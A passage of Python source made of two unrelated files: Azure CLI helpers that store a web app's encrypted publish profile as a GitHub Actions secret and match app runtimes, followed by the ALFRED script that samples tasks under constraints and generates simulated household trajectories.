slot, {"format": "WebDeploy"})
publish_profile = list(publish_profile_bytes)
if publish_profile:
publish_profile = publish_profile[0].decode('ascii')
else:
raise CLIError('Unable to retrieve publish profile.')
# Add publish profile with secrets as a GitHub Actions Secret in the repo
headers = {}
headers['Authorization'] = 'Token {}'.format(token)
headers['Content-Type'] = 'application/json;'
headers['Accept'] = 'application/json;'
public_key_url = "https://api.github.com/repos/{}/actions/secrets/public-key".format(repo)
public_key = requests.get(public_key_url, headers=headers)
if not public_key.ok:
raise CLIError('Request to GitHub for public key failed.')
public_key = public_key.json()
encrypted_github_actions_secret = _encrypt_github_actions_secret(public_key=public_key['key'],
secret_value=str(publish_profile))
payload = {
"encrypted_value": encrypted_github_actions_secret,
"key_id": public_key['key_id']
}
store_secret_url = "https://api.github.com/repos/{}/actions/secrets/{}".format(repo, github_actions_secret_name)
stored_secret = requests.put(store_secret_url, data=json.dumps(payload), headers=headers)
if str(stored_secret.status_code)[0] != '2':
raise CLIError('Unable to add publish profile to GitHub. Request status code: %s' % stored_secret.status_code)
def _remove_publish_profile_from_github(cmd, resource_group, name, repo, token, github_actions_secret_name, slot=None):
headers = {}
headers['Authorization'] = 'Token {}'.format(token)
import requests
store_secret_url = "https://api.github.com/repos/{}/actions/secrets/{}".format(repo, github_actions_secret_name)
requests.delete(store_secret_url, headers=headers)
def _runtime_supports_github_actions(runtime_string, is_linux):
if is_linux:
stacks = get_file_json(RUNTIME_STACKS)['linux']
else:
stacks = get_file_json(RUNTIME_STACKS)['windows']
supports = False
for stack in stacks:
if stack['displayName'].lower() == runtime_string.lower():
if 'github_actions_properties' in stack and stack['github_actions_properties']:
supports = True
return supports
def _get_app_runtime_info(cmd, resource_group, name, slot, is_linux):
app_settings = None
app_runtime = None
if is_linux:
app_metadata = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
app_runtime = getattr(app_metadata, 'linux_fx_version', None)
return _get_app_runtime_info_helper(app_runtime, "", is_linux)
app_metadata = _generic_site_operation(cmd.cli_ctx, resource_group, name, 'list_metadata', slot)
app_metadata_properties = getattr(app_metadata, 'properties', {})
if 'CURRENT_STACK' in app_metadata_properties:
app_runtime = app_metadata_properties['CURRENT_STACK']
if app_runtime and app_runtime.lower() == 'node':
app_settings = get_app_settings(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
for app_setting in app_settings:
if 'name' in app_setting and app_setting['name'] == 'WEBSITE_NODE_DEFAULT_VERSION':
app_runtime_version = app_setting['value'] if 'value' in app_setting else None
if app_runtime_version:
return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux)
elif app_runtime and app_runtime.lower() == 'python':
app_settings = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
app_runtime_version = getattr(app_settings, 'python_version', '')
return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux)
elif app_runtime and app_runtime.lower() == 'dotnetcore':
app_runtime_version = '3.1'
app_runtime_version = ""
return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux)
elif app_runtime and app_runtime.lower() == 'java':
app_settings = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
app_runtime_version = "{java_version}, {java_container}, {java_container_version}".format(
java_version=getattr(app_settings, 'java_version', '').lower(),
java_container=getattr(app_settings, 'java_container', '').lower(),
java_container_version=getattr(app_settings, 'java_container_version', '').lower()
)
return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux)
def _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux):
if is_linux:
stacks = get_file_json(RUNTIME_STACKS)['linux']
for stack in stacks:
if 'github_actions_properties' in stack and stack['github_actions_properties']:
if stack['displayName'].lower() == app_runtime.lower():
return {
"display_name": stack['displayName'],
"github_actions_version": stack['github_actions_properties']['github_actions_version']
}
else:
stacks = get_file_json(RUNTIME_STACKS)['windows']
for stack in stacks:
if 'github_actions_properties' in stack and stack['github_actions_properties']:
if (stack['github_actions_properties']['app_runtime'].lower() == app_runtime.lower() and
stack['github_actions_properties']['app_runtime_version'].lower() ==
app_runtime_version.lower()):
return {
"display_name": stack['displayName'],
"github_actions_version": stack['github_actions_properties']['github_actions_version']
}
return None
def _encrypt_github_actions_secret(public_key, secret_value):
# Encrypt a Unicode string using the public key
from base64 import b64encode
public_key = public.PublicKey(public_key.encode("utf-8"), encoding.Base64Encoder())
sealed_box = public.SealedBox(public_key)
encrypted = sealed_box.encrypt(secret_value.encode("utf-8"))
return b64encode(encrypted).decode("utf-8")
|
generate_trajs.py | import os
import sys
import time
import multiprocessing as mp
import json
import random
import shutil
import argparse
import numpy as np
import pandas as pd
from collections import OrderedDict
from datetime import datetime
from sacred import Ingredient, Experiment
from alfred.env.thor_env import ThorEnv
from alfred.gen import constants
from alfred.gen.agents.deterministic_planner_agent import DeterministicPlannerAgent
from alfred.gen.game_states.task_game_state_full_knowledge import TaskGameStateFullKnowledge
from alfred.gen.utils import video_util, dataset_management_util
from alfred.utils import helper_util
args_ingredient = Ingredient('args')
ex = Experiment('generate_trajs', ingredients=[args_ingredient])
# params
RAW_IMAGES_FOLDER = 'raw_images/'
DATA_JSON_FILENAME = 'traj_data.json'
# video saver
video_saver = video_util.VideoSaver()
# structures to help with constraint enforcement.
goal_to_required_variables = {
"pick_and_place_simple": {"pickup", "receptacle", "scene"},
"pick_two_obj_and_place": {"pickup", "receptacle", "scene"},
"look_at_obj_in_light": {"pickup", "receptacle", "scene"},
"pick_clean_then_place_in_recep": {"pickup", "receptacle", "scene"},
"pick_heat_then_place_in_recep": {"pickup", "receptacle", "scene"},
"pick_cool_then_place_in_recep": {"pickup", "receptacle", "scene"},
"pick_and_place_with_movable_recep": {"pickup", "movable", "receptacle", "scene"}}
goal_to_pickup_type = {
'pick_heat_then_place_in_recep': 'Heatable',
'pick_cool_then_place_in_recep': 'Coolable',
'pick_clean_then_place_in_recep': 'Cleanable'}
goal_to_receptacle_type = {'look_at_obj_in_light': "Toggleable"}
goal_to_invalid_receptacle = {
'pick_heat_then_place_in_recep': {'Microwave'},
'pick_cool_then_place_in_recep': {'Fridge'},
'pick_clean_then_place_in_recep': {'SinkBasin'},
'pick_two_obj_and_place': {'CoffeeMachine', 'ToiletPaperHanger', 'HandTowelHolder'}}
scene_id_to_objs = {}
obj_to_scene_ids = {}
scenes_for_goal = {g: [] for g in constants.GOALS}
scene_to_type = {}
def sample_task_params(
succ_traj, full_traj, fail_traj,
goal_candidates, pickup_candidates, movable_candidates,
receptacle_candidates, scene_candidates, inject_noise=10):
# Get the current conditional distributions of all variables (goal/pickup/receptacle/scene).
goal_weight = [(1 / (1 + np.random.randint(0, inject_noise + 1) + succ_traj.loc[
(succ_traj['pickup'].isin(pickup_candidates) if 'pickup' in goal_to_required_variables[c] else True) &
(succ_traj['movable'].isin(movable_candidates) if 'movable' in goal_to_required_variables[c] else True) &
(succ_traj['receptacle'].isin(receptacle_candidates) if 'receptacle' in goal_to_required_variables[c] else True)
& (succ_traj['scene'].isin(scene_candidates) if 'scene' in goal_to_required_variables[c] else True)]
['goal'].tolist().count(c))) # Conditional.
* (1 / (1 + succ_traj['goal'].tolist().count(c))) # Prior.
for c in goal_candidates]
goal_probs = [w / sum(goal_weight) for w in goal_weight]
pickup_weight = [(1 / (1 + np.random.randint(0, inject_noise + 1) +
sum([succ_traj.loc[
succ_traj['goal'].isin([g]) &
(succ_traj['movable'].isin(movable_candidates)
if 'movable' in goal_to_required_variables[g] else True) &
(succ_traj['receptacle'].isin(receptacle_candidates)
if 'receptacle' in goal_to_required_variables[g] else True) &
(succ_traj['scene'].isin(scene_candidates)
if 'scene' in goal_to_required_variables[g] else True)]
['pickup'].tolist().count(c) for g in goal_candidates])))
* (1 / (1 + succ_traj['pickup'].tolist().count(c)))
for c in pickup_candidates]
pickup_probs = [w / sum(pickup_weight) for w in pickup_weight]
movable_weight = [(1 / (1 + np.random.randint(0, inject_noise + 1) +
sum([succ_traj.loc[
succ_traj['goal'].isin([g]) &
(succ_traj['pickup'].isin(pickup_candidates)
if 'pickup' in goal_to_required_variables[g] else True) &
(succ_traj['receptacle'].isin(receptacle_candidates)
if 'receptacle' in goal_to_required_variables[g] else True) &
(succ_traj['scene'].isin(scene_candidates)
if 'scene' in goal_to_required_variables[g] else True)]
['movable'].tolist().count(c) for g in goal_candidates])))
* (1 / (1 + succ_traj['movable'].tolist().count(c)))
for c in movable_candidates]
movable_probs = [w / sum(movable_weight) for w in movable_weight]
receptacle_weight = [(1 / (1 + np.random.randint(0, inject_noise + 1) +
sum([succ_traj.loc[
succ_traj['goal'].isin([g]) &
(succ_traj['pickup'].isin(pickup_candidates)
if 'pickup' in goal_to_required_variables[g] else True) &
(succ_traj['movable'].isin(movable_candidates)
if 'movable' in goal_to_required_variables[g] else True) &
(succ_traj['scene'].isin(scene_candidates)
if 'scene' in goal_to_required_variables[g] else True)]
['receptacle'].tolist().count(c) for g in goal_candidates])))
* (1 / (1 + succ_traj['receptacle'].tolist().count(c)))
for c in receptacle_candidates]
receptacle_probs = [w / sum(receptacle_weight) for w in receptacle_weight]
scene_weight = [(1 / (1 + np.random.randint(0, inject_noise + 1) +
sum([succ_traj.loc[
succ_traj['goal'].isin([g]) &
(succ_traj['pickup'].isin(pickup_candidates)
if 'pickup' in goal_to_required_variables[g] else True) &
(succ_traj['movable'].isin(movable_candidates)
if 'movable' in goal_to_required_variables[g] else True) &
(succ_traj['receptacle'].isin(receptacle_candidates)
if 'receptacle' in goal_to_required_variables[g] else True)]
['scene'].tolist().count(c) for g in goal_candidates])))
* (1 / (1 + succ_traj['scene'].tolist().count(c)))
for c in scene_candidates]
scene_probs = [w / sum(scene_weight) for w in scene_weight]
# Calculate the probability difference between each value and the maximum so we can iterate over them to find a
# next-best candidate to sample subject to the constraints of knowing which will fail.
diffs = [("goal", goal_candidates[idx], goal_probs[idx] - min(goal_probs))
for idx in range(len(goal_candidates)) if len(goal_candidates) > 1]
diffs.extend([("pickup", pickup_candidates[idx], pickup_probs[idx] - min(pickup_probs))
for idx in range(len(pickup_candidates)) if len(pickup_candidates) > 1])
diffs.extend([("movable", movable_candidates[idx], movable_probs[idx] - min(movable_probs))
for idx in range(len(movable_candidates)) if len(movable_candidates) > 1])
diffs.extend([("receptacle", receptacle_candidates[idx], receptacle_probs[idx] - min(receptacle_probs))
for idx in range(len(receptacle_candidates)) if len(receptacle_candidates) > 1])
diffs.extend([("scene", scene_candidates[idx], scene_probs[idx] - min(scene_probs))
for idx in range(len(scene_candidates)) if len(scene_candidates) > 1])
# Iteratively pop the next biggest difference until we find a combination that is valid (e.g., not already
# flagged as impossible by the simulator).
variable_value_by_diff = {}
diffs_as_keys = [] # list of diffs; index into list will be used as key values.
for _, _, diff in diffs:
already_keyed = False
for existing_diff in diffs_as_keys:
if np.isclose(existing_diff, diff):
already_keyed = True
break
if not already_keyed:
diffs_as_keys.append(diff)
for variable, value, diff in diffs:
key = None
for kidx in range(len(diffs_as_keys)):
if np.isclose(diffs_as_keys[kidx], diff):
key = kidx
if key not in variable_value_by_diff:
variable_value_by_diff[key] = []
variable_value_by_diff[key].append((variable, value))
for key, diff in sorted(enumerate(diffs_as_keys), key=lambda x: x[1], reverse=True):
variable_value = variable_value_by_diff[key]
random.shuffle(variable_value)
for variable, value in variable_value:
# Select a goal.
if variable == "goal":
gtype = value
# print("sampled goal '%s' with prob %.4f" % (gtype, goal_probs[goal_candidates.index(gtype)]))
_goal_candidates = [gtype]
_pickup_candidates = pickup_candidates[:]
_movable_candidates = movable_candidates[:]
_receptacle_candidates = receptacle_candidates[:]
_scene_candidates = scene_candidates[:]
# Select a pickup object.
elif variable == "pickup":
pickup_obj = value
# print("sampled pickup object '%s' with prob %.4f" %
# (pickup_obj, pickup_probs[pickup_candidates.index(pickup_obj)]))
_pickup_candidates = [pickup_obj]
_goal_candidates = goal_candidates[:]
_movable_candidates = movable_candidates[:]
_receptacle_candidates = receptacle_candidates[:]
_scene_candidates = scene_candidates[:]
# Select a movable object.
elif variable == "movable":
movable_obj = value
# print("sampled movable object '%s' with prob %.4f" %
# (movable_obj, movable_probs[movable_candidates.index(movable_obj)]))
_movable_candidates = [movable_obj]
_goal_candidates = [g for g in goal_candidates if g == 'pick_and_place_with_movable_recep']
_pickup_candidates = pickup_candidates[:]
_receptacle_candidates = receptacle_candidates[:]
_scene_candidates = scene_candidates[:]
# Select a receptacle.
elif variable == "receptacle":
receptacle_obj = value
# print("sampled receptacle object '%s' with prob %.4f" %
# (receptacle_obj, receptacle_probs[receptacle_candidates.index(receptacle_obj)]))
_receptacle_candidates = [receptacle_obj]
_goal_candidates = goal_candidates[:]
_pickup_candidates = pickup_candidates[:]
_movable_candidates = movable_candidates[:]
_scene_candidates = scene_candidates[:]
# Select a scene.
else:
sampled_scene = value
# print("sampled scene %s with prob %.4f" %
# (sampled_scene, scene_probs[scene_candidates.index(sampled_scene)]))
_scene_candidates = [sampled_scene]
_goal_candidates = goal_candidates[:]
_pickup_candidates = pickup_candidates[:]
_movable_candidates = movable_candidates[:]
_receptacle_candidates = receptacle_candidates[:]
# Perform constraint propagation to determine whether this is a valid assignment.
propagation_finished = False
while not propagation_finished:
assignment_lens = (len(_goal_candidates), len(_pickup_candidates), len(_movable_candidates),
len(_receptacle_candidates), len(_scene_candidates))
# Constraints on goal.
_goal_candidates = [g for g in _goal_candidates if
(g not in goal_to_pickup_type or
len(set(_pickup_candidates).intersection( # Pickup constraint.
constants.VAL_ACTION_OBJECTS[goal_to_pickup_type[g]])) > 0)
and (g not in goal_to_receptacle_type or
np.any([r in constants.VAL_ACTION_OBJECTS[goal_to_receptacle_type[g]]
for r in _receptacle_candidates])) # Valid by goal receptacle const.
and (g not in goal_to_invalid_receptacle or
len(set(_receptacle_candidates).difference(
goal_to_invalid_receptacle[g])) > 0) # Invalid by goal receptacle const.
and len(set(_scene_candidates).intersection(
scenes_for_goal[g])) > 0 # Scene constraint
]
# Define whether to consider constraints for each role based on current set of candidate goals.
pickup_constrained = np.any(["pickup" in goal_to_required_variables[g] for g in _goal_candidates])
movable_constrained = np.any(["movable" in goal_to_required_variables[g] for g in _goal_candidates])
receptacle_constrained = np.any(["receptacle" in goal_to_required_variables[g]
for g in _goal_candidates])
scene_constrained = np.any(["scene" in goal_to_required_variables[g] for g in _goal_candidates])
# Constraints on pickup obj.
_pickup_candidates = [p for p in _pickup_candidates if
np.any([g not in goal_to_pickup_type or
p in constants.VAL_ACTION_OBJECTS[goal_to_pickup_type[g]]
for g in _goal_candidates]) # Goal constraint.
and (not movable_constrained or
np.any([p in constants.VAL_RECEPTACLE_OBJECTS[m]
for m in _movable_candidates])) # Movable constraint.
and (not receptacle_constrained or
np.any([r in constants.VAL_ACTION_OBJECTS["Toggleable"] or
p in constants.VAL_RECEPTACLE_OBJECTS[r]
for r in _receptacle_candidates])) # Receptacle constraint.
and (not scene_constrained or
np.any([s in obj_to_scene_ids[constants.OBJ_PARENTS[p]]
for s in _scene_candidates])) # Scene constraint
]
# Constraints on movable obj.
_movable_candidates = [m for m in _movable_candidates if
'pick_and_place_with_movable_recep' in _goal_candidates # Goal constraint
and (not pickup_constrained or
np.any([p in constants.VAL_RECEPTACLE_OBJECTS[m]
for p in _pickup_candidates])) # Pickup constraint.
and (not receptacle_constrained or
np.any([r in constants.VAL_RECEPTACLE_OBJECTS and
m in constants.VAL_RECEPTACLE_OBJECTS[r]
for r in _receptacle_candidates])) # Receptacle constraint.
and (not scene_constrained or
np.any([s in obj_to_scene_ids[constants.OBJ_PARENTS[m]]
for s in _scene_candidates])) # Scene constraint
]
# Constraints on receptacle obj.
_receptacle_candidates = [r for r in _receptacle_candidates if
np.any([(g not in goal_to_receptacle_type or
r in constants.VAL_ACTION_OBJECTS[goal_to_receptacle_type[g]]) and
(g not in goal_to_invalid_receptacle or
r not in goal_to_invalid_receptacle[g])
for g in _goal_candidates]) # Goal constraint.
and (not receptacle_constrained or
r in constants.VAL_ACTION_OBJECTS["Toggleable"] or
np.any([p in constants.VAL_RECEPTACLE_OBJECTS[r]
for p in _pickup_candidates])) # Pickup constraint.
and (not movable_constrained or
r in constants.VAL_ACTION_OBJECTS["Toggleable"] or
np.any([m in constants.VAL_RECEPTACLE_OBJECTS[r]
for m in _movable_candidates])) # Movable constraint.
and (not scene_constrained or
np.any([s in obj_to_scene_ids[constants.OBJ_PARENTS[r]]
for s in _scene_candidates])) # Scene constraint
]
# Constraints on scene.
_scene_candidates = [s for s in _scene_candidates if
np.any([s in scenes_for_goal[g]
for g in _goal_candidates]) # Goal constraint.
and (not pickup_constrained or
np.any([obj_to_scene_ids[constants.OBJ_PARENTS[p]]
for p in _pickup_candidates])) # Pickup constraint.
and (not movable_constrained or
np.any([obj_to_scene_ids[constants.OBJ_PARENTS[m]]
for m in _movable_candidates])) # Movable constraint.
and (not receptacle_constrained or
np.any([obj_to_scene_ids[constants.OBJ_PARENTS[r]]
for r in _receptacle_candidates])) # Receptacle constraint.
]
if assignment_lens == (len(_goal_candidates), len(_pickup_candidates), len(_movable_candidates),
len(_receptacle_candidates), len(_scene_candidates)):
propagation_finished = True
candidate_lens = {"goal": len(_goal_candidates), "pickup": len(_pickup_candidates),
"movable": len(_movable_candidates), "receptacle": len(_receptacle_candidates),
"scene": len(_scene_candidates)}
if candidate_lens["goal"] == 0:
# print("Goal over-constrained; skipping")
continue
if np.all([0 in [candidate_lens[v] for v in goal_to_required_variables[g]] for g in _goal_candidates]):
continue
# Ensure some combination of the remaining constraints is not in failures and is not already populated
# by the target number of repeats.
failure_ensured = True
full_ensured = True
for g in _goal_candidates:
pickup_iter = _pickup_candidates if "pickup" in goal_to_required_variables[g] else ["None"]
for p in pickup_iter:
movable_iter = _movable_candidates if "movable" in goal_to_required_variables[g] else ["None"]
for m in movable_iter:
receptacle_iter = _receptacle_candidates if "receptacle" in goal_to_required_variables[g] \
else ["None"]
for r in receptacle_iter:
scene_iter = _scene_candidates if "scene" in goal_to_required_variables[g] else ["None"]
for s in scene_iter:
if (g, p, m, r, s) not in fail_traj:
failure_ensured = False
if (g, p, m, r, s) not in full_traj:
full_ensured = False
if not failure_ensured and not full_ensured:
break
if not failure_ensured and not full_ensured:
break
if not failure_ensured and not full_ensured:
break
if not failure_ensured and not full_ensured:
break
if not failure_ensured and not full_ensured:
break
if failure_ensured:
continue
if full_ensured:
continue
if candidate_lens["goal"] > 1 or np.any([np.any([candidate_lens[v] > 1
for v in goal_to_required_variables[g]])
for g in _goal_candidates]):
task_sampler = sample_task_params(succ_traj, full_traj, fail_traj,
_goal_candidates, _pickup_candidates, _movable_candidates,
_receptacle_candidates, _scene_candidates)
sampled_task = next(task_sampler)
if sampled_task is None:
continue
else:
g = _goal_candidates[0]
p = _pickup_candidates[0] if "pickup" in goal_to_required_variables[g] else "None"
m = _movable_candidates[0] if "movable" in goal_to_required_variables[g] else "None"
r = _receptacle_candidates[0] if "receptacle" in goal_to_required_variables[g] else "None"
s = _scene_candidates[0] if "scene" in goal_to_required_variables[g] else "None"
sampled_task = (g, p, m, r, int(s))
yield sampled_task
yield None # Discovered that there are no valid assignments remaining.
def print_successes(succ_traj):
print("###################################\n")
print("Successes: ")
print(succ_traj)
print("\n##################################")
def generate(args):
# settings
constants.DATA_SAVE_PATH = args.save_path
print("Force Unsave Data: %s" % str(args.force_unsave))
# set x_display
if isinstance(args.x_display, (list, tuple)):
args.x_display = random.choice(args.x_display)
# Set up data structure to track dataset balance and use for selecting next parameters.
# In actively gathering data, we will try to maximize entropy for each (e.g., uniform spread of goals,
# uniform spread over patient objects, uniform recipient objects, and uniform scenes).
succ_traj = pd.DataFrame(columns=["goal", "pickup", "movable", "receptacle", "scene"])
# objects-to-scene and scene-to-objects database
for scene_type, ids in constants.SCENE_TYPE.items():
for id in ids:
obj_json_file = os.path.join(
constants.LAYOUTS_PATH, 'FloorPlan%d-objects.json' % id)
with open(obj_json_file, 'r') as of:
scene_objs = json.load(of)
id_str = str(id)
scene_id_to_objs[id_str] = scene_objs
for obj in scene_objs:
if obj not in obj_to_scene_ids:
obj_to_scene_ids[obj] = set()
obj_to_scene_ids[obj].add(id_str)
# scene-goal database
for g in constants.GOALS:
for st in constants.GOALS_VALID[g]:
scenes_for_goal[g].extend([str(s) for s in constants.SCENE_TYPE[st]])
scenes_for_goal[g] = set(scenes_for_goal[g])
# scene-type database
for st in constants.SCENE_TYPE:
for s in constants.SCENE_TYPE[st]:
scene_to_type[str(s)] = st
# pre-populate counts in this structure using saved trajectories path.
succ_traj, full_traj = dataset_management_util.load_successes_from_disk(
args.save_path, succ_traj, args.just_examine, args.repeats_per_cond)
if args.just_examine:
print_successes(succ_traj)
return
# pre-populate failed trajectories.
fail_traj = dataset_management_util.load_fails_from_disk(args.save_path)
print("Loaded %d known failed tuples" % len(fail_traj))
# create env and agent
env = ThorEnv(x_display=args.x_display)
game_state = TaskGameStateFullKnowledge(env)
agent = DeterministicPlannerAgent(thread_id=0, game_state=game_state)
errors = {} # map from error strings to counts, to be shown after every failure.
goal_candidates = constants.GOALS[:]
# Union objects that can be placed.
pickup_candidates = list(set().union(*[constants.VAL_RECEPTACLE_OBJECTS[obj]
for obj in constants.VAL_RECEPTACLE_OBJECTS]))
pickup_candidates = [
p for p in pickup_candidates if constants.OBJ_PARENTS[p] in obj_to_scene_ids]
movable_candidates = list(
set(constants.MOVABLE_RECEPTACLES).intersection(obj_to_scene_ids.keys()))
receptacle_candidates = [
obj for obj in constants.VAL_RECEPTACLE_OBJECTS
if obj not in constants.MOVABLE_RECEPTACLES and obj in obj_to_scene_ids] + \
[obj for obj in constants.VAL_ACTION_OBJECTS["Toggleable"]
if obj in obj_to_scene_ids]
# toaster isn't interesting in terms of producing linguistic diversity
receptacle_candidates.remove('Toaster')
receptacle_candidates.sort()
scene_candidates = list(scene_id_to_objs.keys())
n_until_load_successes = args.async_load_every_n_samples
print_successes(succ_traj)
task_sampler = sample_task_params(
succ_traj, full_traj, fail_traj,
goal_candidates, pickup_candidates, movable_candidates,
receptacle_candidates, scene_candidates)
# main generation loop
# keeps trying out new task tuples as trajectories either fail or suceed
while True:
sampled_task = next(task_sampler)
print(sampled_task) # DEBUG
if sampled_task is None:
sys.exit("No valid tuples left to sample (all are known to fail or already have %d trajectories" % args.repeats_per_cond)
gtype, pickup_obj, movable_obj, receptacle_obj, sampled_scene = sampled_task
print("sampled tuple: " + str((gtype, pickup_obj, movable_obj, receptacle_obj, sampled_scene)))
tries_remaining = args.trials_before_fail
# only try to get the number of trajectories left to make this tuple full.
target_remaining = args.repeats_per_cond - len(
succ_traj.loc[(succ_traj['goal'] == gtype) &
(succ_traj['pickup'] == pickup_obj) &
(succ_traj['movable'] == movable_obj) &
(succ_traj['receptacle'] == receptacle_obj) &
(succ_traj['scene'] == str(sampled_scene))])
# count of errors related to placement failure for no valid positions.
num_place_fails = 0
# continue until we're (out of tries + have never succeeded)
# or (have gathered the target number of instances)
while tries_remaining > 0 and target_remaining > 0:
# environment setup
constants.pddl_goal_type = gtype
print("PDDLGoalType: " + constants.pddl_goal_type)
task_id = create_dirs(
gtype, pickup_obj, movable_obj, receptacle_obj, sampled_scene)
# setup data dictionary
setup_data_dict()
constants.data_dict['task_id'] = task_id
constants.data_dict['task_type'] = constants.pddl_goal_type
constants.data_dict['dataset_params']['video_frame_rate'] = constants.VIDEO_FRAME_RATE
# plan & execute
try:
# Agent reset to new scene.
constraint_objs = {
'repeat': [
(constants.OBJ_PARENTS[pickup_obj], # Generate multiple parent objs.
np.random.randint(2 if gtype == "pick_two_obj_and_place" else 1,
constants.PICKUP_REPEAT_MAX + 1))],
'sparse': [
(receptacle_obj.replace('Basin', ''),
num_place_fails * constants.RECEPTACLE_SPARSE_POINTS)]}
if movable_obj != "None":
constraint_objs['repeat'].append(
(movable_obj, np.random.randint(1, constants.PICKUP_REPEAT_MAX + 1)))
for obj_type in scene_id_to_objs[str(sampled_scene)]:
if (obj_type in pickup_candidates and
obj_type != constants.OBJ_PARENTS[pickup_obj] and
obj_type != movable_obj):
constraint_objs['repeat'].append(
(obj_type,
np.random.randint(1, constants.MAX_NUM_OF_OBJ_INSTANCES + 1)))
if gtype in goal_to_invalid_receptacle:
constraint_objs['empty'] = [
(r.replace('Basin', ''),
num_place_fails * constants.RECEPTACLE_EMPTY_POINTS)
for r in goal_to_invalid_receptacle[gtype]]
constraint_objs['seton'] = []
if gtype == 'look_at_obj_in_light':
constraint_objs['seton'].append((receptacle_obj, False))
if num_place_fails > 0:
print("Failed %d placements in the past; increased free point constraints: " % num_place_fails + str(constraint_objs))
scene_info = {'scene_num': sampled_scene,
'random_seed': random.randint(0, 2 ** 32)}
info = agent.reset(scene=scene_info,
objs=constraint_objs)
# Problem initialization with given constraints.
task_objs = {'pickup': pickup_obj}
if movable_obj != "None":
task_objs['mrecep'] = movable_obj
if gtype == "look_at_obj_in_light":
task_objs['toggle'] = receptacle_obj
else:
task_objs['receptacle'] = receptacle_obj
agent.setup_problem({'info': info}, scene=scene_info, objs=task_objs)
# Now that objects are in their initial places, record them.
object_poses = [{'objectName': obj['name'].split('(Clone)')[0],
'position': obj['position'],
'rotation': obj['rotation']}
for obj in env.last_event.metadata['objects'] if obj['pickupable']]
dirty_and_empty = gtype == 'pick_clean_then_place_in_recep'
object_toggles = [{'objectType': o, 'isOn': v}
for o, v in constraint_objs['seton']]
constants.data_dict['scene']['object_poses'] = object_poses
constants.data_dict['scene']['dirty_and_empty'] = dirty_and_empty
constants.data_dict['scene']['object_toggles'] = object_toggles
# Pre-restore the scene to cause objects to "jitter" like they will when the episode is replayed
# based on stored object and toggle info. This should put objects closer to the final positions they'll
# be inlay at inference time (e.g., mugs fallen and broken, knives fallen over, etc.).
print("Performing reset via thor_env API")
env.reset(sampled_scene)
print("Performing restore via thor_env API")
env.restore_scene(object_poses, object_toggles, dirty_and_empty)
event = env.step(dict(constants.data_dict['scene']['init_action']))
terminal = False
while not terminal and agent.current_frame_count <= constants.MAX_EPISODE_LENGTH:
action_dict = agent.get_action(None)
agent.step(action_dict)
reward, terminal = agent.get_reward()
dump_data_dict()
save_video()
except Exception as e:
import traceback
traceback.print_exc()
print("Error: " + repr(e))
print("Invalid Task: skipping...")
if args.debug:
print(traceback.format_exc())
deleted = delete_save(args.num_threads > 0)
# another thread is filling this task successfully, so leave it alone.
if not deleted:
target_remaining = 0 # stop trying to do this task.
else:
if str(e) == "API Action Failed: No valid positions to place object found":
# Try increasing the space available on sparse and empty flagged objects.
num_place_fails += 1
tries_remaining -= 1
else: # generic error
tries_remaining -= 1
estr = str(e)
if len(estr) > 120:
estr = estr[:120]
if estr not in errors:
errors[estr] = 0
errors[estr] += 1
print("%%%%%%%%%%")
es = sum([errors[er] for er in errors])
print("\terrors (%d):" % es)
for er, v in sorted(errors.items(), key=lambda kv: kv[1], reverse=True):
if v / es < 0.01: # stop showing below 1% of errors.
break
print("\t(%.2f) (%d)\t%s" % (v / es, v, er))
print("%%%%%%%%%%")
continue
if args.force_unsave:
delete_save(args.num_threads > 0)
# add to save structure.
succ_traj = succ_traj.append({
"goal": gtype,
"movable": movable_obj,
"pickup": pickup_obj,
"receptacle": receptacle_obj,
"scene": str(sampled_scene)}, ignore_index=True)
target_remaining -= 1
# on success, add more tries for future successes
tries_remaining += args.trials_before_fail
# if this combination resulted in a certain number of failures with no successes,
# flag it as not possible.
if tries_remaining == 0 and target_remaining == args.repeats_per_cond:
new_fails = [(gtype, pickup_obj, movable_obj, receptacle_obj, str(sampled_scene))]
fail_traj = dataset_management_util.load_fails_from_disk(
args.save_path, to_write=new_fails)
print("%%%%%%%%%%")
print("failures (%d)" % len(fail_traj))
# print("\t" + "\n\t".join([str(ft) for ft in fail_traj]))
print("%%%%%%%%%%")
# if this combination gave us the repeats we wanted, note it as filled.
if target_remaining == 0:
full_traj.add((gtype, pickup_obj, movable_obj, receptacle_obj, sampled_scene))
# if we're sharing with other processes,
# reload successes from disk to update local copy with others' additions.
if args.num_threads > 0:
if n_until_load_successes > 0:
n_until_load_successes -= 1
else:
print("Reloading trajectories from disk because of parallel processes...")
succ_traj = pd.DataFrame(columns=succ_traj.columns) # Drop all rows.
succ_traj, full_traj = load_successes_from_disk(
args.save_path, succ_traj, False, args.repeats_per_cond)
print("... Loaded %d trajectories" % len(succ_traj.index))
n_until_load_successes = args.async_load_every_n_samples
print_successes(succ_traj)
task_sampler = sample_task_params(
succ_traj, full_traj, fail_traj,
goal_candidates, pickup_candidates, movable_candidates,
receptacle_candidates, scene_candidates)
print("... Created fresh instance of sample_task_params generator")
def create_dirs(gtype, pickup_obj, movable_obj, receptacle_obj, scene_num):
task_id = 'trial_T' + datetime.now().strftime("%Y%m%d_%H%M%S_%f")
save_name = '%s-%s-%s-%s-%d' % (
gtype, pickup_obj, movable_obj, receptacle_obj, scene_num) + '/' + task_id
constants.save_path = os.path.join(constants.DATA_SAVE_PATH, save_name, RAW_IMAGES_FOLDER)
if not os.path.exists(constants.save_path):
os.makedirs(constants.save_path)
print("Saving images to: " + constants.save_path)
return task_id
def save_video():
images_path = constants.save_path + '*.png'
video_path = os.path.join(constants.save_path.replace(RAW_IMAGES_FOLDER, ''), 'video.mp4')
video_saver.save(images_path, video_path)
def setup_data_dict():
constants.data_dict = OrderedDict()
constants.data_dict['task_id'] = ""
constants.data_dict['task_type'] = ""
constants.data_dict['scene'] = {
'floor_plan': "", 'random_seed': -1, 'scene_num': -1, 'init_action': [],
'object_poses': [], 'dirty_and_empty': None, 'object_toggles': []}
constants.data_dict['plan'] = {'high_pddl': [], 'low_actions': []}
constants.data_dict['images'] = []
constants.data_dict['template'] = {'task_desc': "", 'high_descs': []}
